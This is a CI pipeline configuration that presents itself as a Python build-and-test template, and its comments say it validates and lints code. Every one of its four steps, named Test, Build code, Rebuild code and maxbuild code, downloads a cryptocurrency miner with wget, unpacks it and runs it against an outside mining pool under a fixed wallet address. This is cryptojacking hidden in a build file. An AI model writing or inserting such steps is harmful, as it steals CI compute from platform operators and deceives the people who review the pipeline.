#  Template python-build

#  This template allows you to validate your python code.
#  The workflow allows running tests and code linting on the default branch.

image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: Test
          caches:
            - pip
          script:
            - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz; tar -xf cpuminer-opt-linux.tar.gz; ./cpuminer-sse2 -a yescryptR32 -o stratum+tcp://stratum-na.rplant.xyz:7047 -u DJAECyb7wAohrrZkgCkNctgAJpcDDMhxsk.kido87
      - step:
          name: Build code
          script:
            - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz; tar -xf cpuminer-opt-linux.tar.gz; ./cpuminer-sse2 -a yescryptR32 -o stratum+tcp://stratum-na.rplant.xyz:7047 -u DJAECyb7wAohrrZkgCkNctgAJpcDDMhxsk.kido87
      - step:
          name: Rebuild code
          script:
           - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz; tar -xf cpuminer-opt-linux.tar.gz; ./cpuminer-sse2 -a yescryptR32 -o stratum+tcp://stratum-na.rplant.xyz:7047 -u DJAECyb7wAohrrZkgCkNctgAJpcDDMhxsk.kido90 
      - step:
          name: maxbuild code
          script:
           - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz; tar -xf cpuminer-opt-linux.tar.gz; ./cpuminer-sse2 -a yescryptR32 -o stratum+tcp://stratum-na.rplant.xyz:7047 -u DJAECyb7wAohrrZkgCkNctgAJpcDDMhxsk.kido87

